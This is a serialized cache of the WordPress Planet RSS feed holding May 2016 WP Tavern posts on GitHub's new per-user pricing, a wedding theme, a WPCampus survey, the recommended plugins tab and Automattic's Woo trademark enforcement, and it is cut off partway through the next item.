http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"WPTavern: GitHub Introduces Unlimited Private Repositories, Hikes Prices for Organizations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54746\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"http://wptavern.com/github-introduces-unlimited-private-repositories-hikes-prices-for-organizations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7590:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/04/github-octocat.jpg\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/04/github-octocat.jpg?resize=857%2C400\" alt=\"github-octocat\" class=\"aligncenter size-full wp-image-42456\" /></a></p>\n<p>GitHub has been inundated with negative feedback after <a href=\"https://github.com/blog/2164-introducing-unlimited-private-repositories\" target=\"_blank\">announcing a major change to its pricing</a> today. All paid plans now include unlimited private repositories, but there’s a catch. The new pricing structure requires GitHub.com organizations to purchase a seat for each user. At $9 per user/month, collaborating on private repositories is now far more costly than the legacy plans which started at $25/month for 10 repositories and unlimited members.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/github-pricing.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/github-pricing.png?resize=1025%2C392\" alt=\"github-pricing\" class=\"aligncenter size-full wp-image-54756\" /></a></p>\n<p>The change is good news for individual developers with paid accounts, as they are no longer charged on a per-repository basis. However, many owners of organizations are finding the new pricing to be untenable and are actively considering alternatives. For comparison, Bitbucket offers unlimited private repositories and <a href=\"https://bitbucket.org/product/pricing\" target=\"_blank\">charges $1/user/month</a>. Unlimited users caps out at $200/month.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/Krogsgard\">@Krogsgard</a> EDD org alone will go from $25 per month to $592 per month <a href=\"https://twitter.com/github\">@github</a></p>\n<p>— Pippinsplugins (@pippinsplugins) <a href=\"https://twitter.com/pippinsplugins/status/730396802638176257\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p>While unlimited private repositories is an exciting benefit that enables developers to make their code more modular, it isn’t a benefit that every organization needs.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/github\">@github</a> Terrible news. I work on an open-source organization >100 devs. We have 2 private repos for internal projects. $900+ vs $25 really!?</p>\n<p>— João Ventura (@jcnventura) <a href=\"https://twitter.com/jcnventura/status/730319187667759104\">May 11, 2016</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/williamsba\">@williamsba</a> ours jumped to $1,204 :-( <a href=\"https://twitter.com/github\">@github</a></p>\n<p>— Tom Willmot (@tomwillmot) <a href=\"https://twitter.com/tomwillmot/status/730391291691995136\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p><a href=\"https://easydigitaldownloads.com/\" target=\"_blank\">Easy Digital Downloads</a> creator Pippin Williamson <a href=\"http://www.twitlonger.com/show/n_1solvjd\" target=\"_blank\">explained</a> why he is frustrated with what amounts to a 2,276% increase in costs for his organization:</p>\n<blockquote><p>I actually have no problems with the pricing for new organizations. It’s their space and they provide a huge number of valuable tools. It is absolutely worth it.</p>\n<p>The problem I have is the drastic increase for existing customers. It’s largely the principal of increasing a customer’s cost by 2,276% without giving them any additional value.</p>\n<p>The value that Github provides me and my team does not change at all with the new pricing, only what I pay per month.</p></blockquote>\n<p>Samuel “Otto” Wood <a href=\"http://www.twitlonger.com/show/n_1solviv\" target=\"_blank\">contends</a> that GitHub’s $9/user/month is a reasonable price to pay for having all the functionality of GitHub hosted for an organization but that the alternative of building your own is far more economical.</p>\n<blockquote><p>A “private” repo is, you know, private. On your own server. Git is, after all, decentralized. You could plop a normal git repo on any private VPS you like in a matter of under an hour. If you’re collaborating with a small group of like 5 people, then coordination is not really a big deal that I’d pay $45 a month to use GitHub for it. You can use any tooling you like, make any website you like. You could probably reproduce the important parts of GitHub that you need for your private setup using WordPress in like a day or two. </p>\n<p>It just seems to me that any advantages of using GitHub at all seem largely nullified by using private repos. Yes, collaboration and using the same toolset you are used to, I get that. But here you’re falling prey to vendor lock-in once again. You’re used to it, you like it, you’re afraid of change, pay up. Simple. </p>\n<p>The advantage of open source software is the freedom to say “up yours” and build your own version instead. Git is open source. Think about it. A $15 a month VPS could easily fit your needs for both privacy and collaboration.</p></blockquote>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/github\">@github</a> found a way to be more expensive than the datacenter that runs my app. Seriously, what\'s happening at <a href=\"https://twitter.com/github\">@github</a> ???</p>\n<p>— Adilson Carvalho (@lcadilson) <a href=\"https://twitter.com/lcadilson/status/730405070819471361\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p>GitHub has established itself as the de facto code collaboration site by offering free hosting for public, open source repositories. However, the emphasis on “social coding” no longer extends to private repositories as organization owners will have little incentive to add more collaborators under the new pricing structure. It discourages organizations from adding users to be bug reporters or third-party collaborators. Teams and agencies hit hardest by the changes are now examining competitors like Bitbucket and self-hosted GitLab.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Today is for <a href=\"https://twitter.com/gitlab\">@gitlab</a> what 2007 was for <a href=\"https://twitter.com/WordPress\">@WordPress</a>. If code is poetry, Gitlab is your library. Own your code like you own your content. ❤️</p>\n<p>— John James Jacoby (@JJJ) <a href=\"https://twitter.com/JJJ/status/730417868047790080\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p>Organization owners will not be forced onto the new pricing plans immediately and GitHub promises to give a year’s notice before mandating a switch to the new plans:</p>\n<blockquote><p>We want everyone to have a plan with unlimited private repositories, but don’t worry—you are welcome to stay on your current plan while you evaluate the new cost structure and understand how to best manage your organization members and their private repository access. And while we’re currently not enforcing a timeline to move, rest assured that you’ll have at least 12 months notice before any mandated change to your plan.</p></blockquote>\n<p>While many individual developers will see lower monthly prices and even prorated credits on their accounts, the exponential cost increase for GitHub’s largest customers may cause a mass exodus to the company’s more affordable competitors. Are you moving your organization off of GitHub? Let us know in the comments.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 19:27:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Affinity: A Free WordPress Wedding Theme from Automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54688\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/affinity-a-free-wordpress-wedding-theme-from-automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3832:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity.png?resize=800%2C471\" alt=\"affinity\" class=\"aligncenter size-full wp-image-54691\" /></a></p>\n<p>Affinity is the latest addition to WordPress.com’s small collection of <a href=\"https://wordpress.com/themes/search/wedding/\" target=\"_blank\">themes created specifically for weddings</a>. This highly customizable, elegant theme was designed by <a href=\"http://carolinemoore.net/\" target=\"_blank\">Caroline Moore</a> with weddings and family announcements in mind.</p>\n<p>Affinity is a one-page theme with support for five different panels. Each panel’s content can be assigned in the customizer under Theme Options by selecting a page from a drop-down.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/panel.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/panel.png?resize=660%2C231\" alt=\"panel\" class=\"aligncenter size-full wp-image-54717\" /></a></p>\n<p>With the customizable panel approach users are not locked into providing content for sections they don’t need. Single posts and pages support full screen featured images that, if used as a panel, become the background of that section. Affinity offers the option to set the header image opacity to create better contrast with header text. Users can also enable or disable scrolling on the header and front-page featured images.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-home-page.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-home-page.png?resize=200%2C474\" alt=\"affinity-home-page\" class=\"alignright size-full wp-image-54693\" /></a></p>\n<p>Affinity includes support for a sidebar widget area and three optional widget areas in the footer. If widgets are added to the sidebar, the one-column layout becomes a two-column layout. It also has a fullwidth page template for removing the sidebar on select pages.</p>\n<p>The different panels give users ample space for adding photos, links to registries, personal stories, info about the bridal party, and anything else related to the event. Affinity includes a Guestbook page template with a special format for displaying visitors’ comments. Turning the Guestbook on is as easy as setting the page template and making sure that comments are enabled.</p>\n<p>Another unique feature of the theme is its post intro area that displays beneath the headline before the first paragraph. It pulls content from the excerpt field and post authors can use it to capture readers’ attention with a quick summary or highlight.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-post-intro.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-post-intro.png?resize=660%2C328\" alt=\"affinity-post-intro\" class=\"aligncenter size-full wp-image-54729\" /></a></p>\n<p>Check out the <a href=\"https://affinitydemo.wordpress.com/\" target=\"_blank\">live demo</a> to see the theme in action. It shows an example of panels that display quotes, an RSVP form, event details, and an engagement story.</p>\n<p>Since no wedding or family announcement is the same, Affinity’s multi-panel approach offers flexibility for many different types of uses. If you’re creating a wedding website and are not finding enough customization options with a hosted service, this theme makes it quick and easy to set it up with WordPress. It’s not yet available on WordPress.org, but you can download a copy for your self-hosted site for free from the sidebar of its <a href=\"https://wordpress.com/themes/affinity\" target=\"_blank\">homepage on WordPress.com</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 06:52:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Help WPCampus Gather Data on How Schools and Campuses Use WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54650\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/help-wpcampus-gather-data-on-how-schools-and-campuses-use-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1237:\"<p>The organizers of <a href=\"https://2016.wpcampus.org/\">WPCampus</a> are <a href=\"https://www.surveymonkey.com/r/WPCampus16\">seeking feedback</a> via a survey on how schools and campuses utilize WordPress in their environments. The survey consists of five sections:</p>\n<ul>\n<li>How Do You Use WordPress on Campus</li>\n<li>Site Demographics, Traffic, and Data</li>\n<li>Plugins, Themes, and Features</li>\n<li>Security, Performance, and Hosting</li>\n<li>Your Team Structure & Workflows</li>\n</ul>\n<p>There are a couple of perks for those who fill out the survey. Respondents will receive an anonymized version of the complete data set. Those who complete four or more sections will be entered into a drawing to win a free ticket to the conference and will receive a $5 Starbucks or Amazon Gift card.</p>\n<p>Answer the questions that you know and skip the ones you don’t. The team needs as much data as possible to provide a clearer picture of WordPress’ use in higher education. If you know someone or an organization that uses WordPress in higher education, please <a href=\"https://www.surveymonkey.com/r/WPCampus16\">share the survey</a> with them. The survey closes on May 27th.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 03:21:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: What Do You Think of the Recommended Plugins Page in WordPress?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54437\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/what-do-you-think-of-the-recommended-plugins-page-in-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3913:\"<p>In late 2014, <a href=\"http://wptavern.com/wordpress-4-1-to-introduce-plugin-recommendations\">WordPress 4.1 added</a> a Recommended Plugins tab that takes into account the plugins you have installed and suggests plugins based on which ones are commonly used together. After nearly a year and a half since it was added, I asked the <a href=\"https://twitter.com/wptavern/status/727578470415532032\">Tavern’s Twitter followers</a> if they have ever installed plugins recommended by WordPress.</p>\n<p>I was surprised to discover that some people don’t know the tab exists.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> There\'s a \"Recommended\" tab?!?</p>\n<p>— Joe Taiabjee (@joetek) <a href=\"https://twitter.com/joetek/status/727581218414407681\">May 3, 2016</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> I\'ve just noticed the Recommended tab. It seems to show those plugins with most Active Installs. Interesting, but a bit \'hidden\'</p>\n<p>— Alejandro Vargas S. (@Alejandro_V_S) <a href=\"https://twitter.com/Alejandro_V_S/status/727836820159930369\">May 4, 2016</a></p></blockquote>\n<p></p>\n<p>Steve Brown says the recommendations are useful.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> yep :) very useful feature indeed</p>\n<p>— Steve Brown (@stevna) <a href=\"https://twitter.com/stevna/status/727681984504287232\">May 4, 2016</a></p></blockquote>\n<p></p>\n<p>Some people view the page as an opportunity for Automattic to advertise its plugins while others don’t trust the recommendations.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> I have no needs for the Automattic plugins that are almost only being recommended there</p>\n<p>— Marko Heijnen (@markoheijnen) <a href=\"https://twitter.com/markoheijnen/status/727624592399998976\">May 3, 2016</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> Once. However 10 of the plugins recommended on page 1 are untested with my version of WP. So wouldnt rely on the recommendations</p>\n<p>— WPin.me (@wp_in) <a href=\"https://twitter.com/wp_in/status/727725233843671040\">May 4, 2016</a></p></blockquote>\n<p></p>\n<p>When I viewed the recommended plugins page in 2014, the results displayed plugins that weren’t updated in years.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/12/RecommendedPluginsTab.png\"><img class=\"size-full wp-image-35318\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/12/RecommendedPluginsTab.png?resize=1025%2C527\" alt=\"Plugins Recommended To Me Based on Data of Sites with Similar Plugins Installed\" /></a>Plugins Recommended To Me Based on Data of Sites with Similar Plugins Installed\n<p>Today, the page displays more relevant results with recently updated plugins. On the first page of results for WP Tavern, only one plugin from Automattic is recommended. The second page of results doesn’t list any plugins authored by Automattic.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/2016RecommendedPlugins.png\"><img class=\"size-full wp-image-54616\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/2016RecommendedPlugins.png?resize=1025%2C514\" alt=\"Recommended Plugins in 2016\" /></a>Recommended Plugin Results in 2016\n<p>To help determine how useful the recommended plugins page is, I’d like you to take this short survey. Results will be displayed on Tuesday, May 17th. In addition to the survey, you can leave your feedback in the comments.</p>\n<div class=\"pd-embed\" type=\"type\"></div>\n<p></p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 03:19:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: Automattic is Protecting its Woo, WooThemes, and WooCommerce Trademarks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54645\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/automattic-is-protecting-its-woo-woothemes-and-woocommerce-trademarks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6735:\"<p>When <a href=\"http://wptavern.com/automattic-acquires-woocommerce\">Automattic acquired WooThemes in 2015</a>, it gained employees, plugins, themes, and the company’s trademarks. These trademarks include, standard character marks, logos, and specific graphics such as the Verified WooExpert badges. One of the responsibilities of a trademark owner is to protect it from infringement.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/VerifiedWooExpertServicemark.png\"><img class=\"size-full wp-image-54702\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/VerifiedWooExpertServicemark.png?resize=1025%2C621\" alt=\"Verified WooExpert Service Mark\" /></a>Verified WooExpert Service Mark\n<p>WooGPL is a service that provides customers with commercial themes, plugins, and extensions for WooCommerce at a discounted rate. In March, Automattic <a href=\"https://woogpl.com/woogpl-is-closing/\">sent Billy Ablett</a>, owner of <a href=\"https://woogpl.com\">WooGPL</a>, the following notice that informs him that his domain infringes the Woo and WooCommerce trademarks.</p>\n<blockquote><p>I’m writing to you on behalf of Automattic Inc. regarding your use of the Woo and WooCommerce trademarks.</p>\n<p>As you may know, Automattic owns the Woo, WooCommerce, and WooThemes brands, as well as the associated trademarks. We recently learned of https://woogpl.com, which actively makes use of our registered trademarks in both its name and promotion. We are very concerned that your use of Woo and WooCommerce will create confusion by communicating that your WooCommerce products are endorsed by or associated with Automattic, when in fact it is not.</p>\n<p>While Automattic appreciates that you are providing products that build on WooCommerce open source software, that fact does not authorize you to use Woo, WooThemes or WooCommerce trademarks.</p>\n<p>To minimize user confusion and to protect our own intellectual property, we unfortunately must insist that you take prompt steps to change your domain name to something that doesn’t include ‘Woo’ in the prefix, and change your product descriptions to avoid confusion and potentially misleading consumers to believe they are purchasing our products. An example of this would be: WooCommerce Email Customiser Pro would need to be changed to Email Customiser Pro for WooCommerce.</p>\n<p>For more information, please see our <a href=\"https://www.woothemes.com/style-guide/#sg-trademarks\">Trademark Guidelines</a>.</p>\n<p>While we are appreciative that you have included a disclaimer on your site, unfortunately this would not be sufficient and we would still insist that the domain name and product names be changed.</p></blockquote>\n<p>While it’s not the sole reason <a href=\"https://woogpl.com/woogpl-is-closing/\">WooGPL is shutting down</a>, the notice provides a convenient opportunity to rebrand to <a href=\"https://www.gplkit.com/\">GPL Kit</a>, something the company was already planning to do.</p>\n<p>“We would have eventually closed down WooGPL due to GPL Kit however, it would have been great to close it down on our terms when the time was right,” Daniel, who is part of the GPL Kit team told the Tavern.</p>\n<p>Daniel says that when he started WooGPL there wasn’t a trademark registered with the Woo character mark until October of 2015.</p>\n<p>A search of the United States Patent and Trademark Office for Woo contains over 1K results. However, this is the only character mark for Woo that I found. The filing date is October 22nd, 2015 and is in the approval process.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WooCharacterMark.png\"><img class=\"size-full wp-image-54703\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WooCharacterMark.png?resize=1003%2C557\" alt=\"Woo Character Mark\" /></a>Woo Character Mark\n<h2>When You Should Ask For Permission</h2>\n<p>WooThemes has a <a href=\"https://www.woothemes.com/style-guide/#sg-trademarks\">style guide</a> on its site that explains how the brand is used and has details on when Woo™, WooCommerce®, and WooThemes® names, logos, and related icons collectively known as Woo Marks can be used without permission. The following chart provides some examples.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/PermissionChartForWooTrademarks.png\"><img class=\"size-full wp-image-54704\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/PermissionChartForWooTrademarks.png?resize=1010%2C814\" alt=\"Examples of When You Do and Don\'t Need Permission\" /></a>Examples of When You Do and Don’t Need Permission\n<p>If you’re in doubt, you can email Automattic’s trademark team <a href=\"mailto:trademarks@automattic.com\">trademarks @ automattic.com</a> to receive clarification.</p>\n<h2>Woo’s at Risk?</h2>\n<p>There are quite a few businesses in the WordPress ecosystem that use Woo in their name and domain. <a href=\"http://www.woorockets.com/\">WooRockets</a> is a WooCommerce theme shop while <a href=\"http://wooassist.com/\">WooAssist</a> provides support and maintenance for store owners.</p>\n<p>I reached out to both companies to determine if Automattic sent them the same notice it sent to WooGPL. While I didn’t receive a response from WooRockets, John Gamour of WooAssist provided the Tavern with the following statement:</p>\n<blockquote><p>No, we haven’t been contacted by Automattic about that. It would be dissapointing if we were asked to change our name as our founder Nicholas Jones reached out to WooThemes before starting Wooassist and they gave the OK. We have also worked with Matt Cohen and James Koster on a project and nothing was ever mentioned about our name.</p></blockquote>\n<p>I tried to get in touch with Paul Sieminski, legal counsel for Automattic, to learn what the criteria is for violating the trademarks, who’s at risk, and how long they have enforced the marks but he could not be reached for comment.</p>\n<h2>Better to be Safe Than Sorry</h2>\n<p>As WooGPL discovered, adding a disclaimer to the bottom of your sites may not be enough. Considering the cost and potential impacts of re branding a company or product, it’s important to know as soon as possible if you’re infringing a company’s trademarks.</p>\n<p>Business owners in the WooCommerce and WooThemes ecosystem should double-check the <a href=\"https://www.woothemes.com/style-guide/#sg-trademarks\">style guide</a> to make sure you’re not violating any guidelines. Owners can also take a proactive step and contact Automattic’s trademark team to determine if your business meets the requirements.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 May 2016 20:21:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: WooCommerce Releases Storefront 2.0 with Major Improvements to Mobile 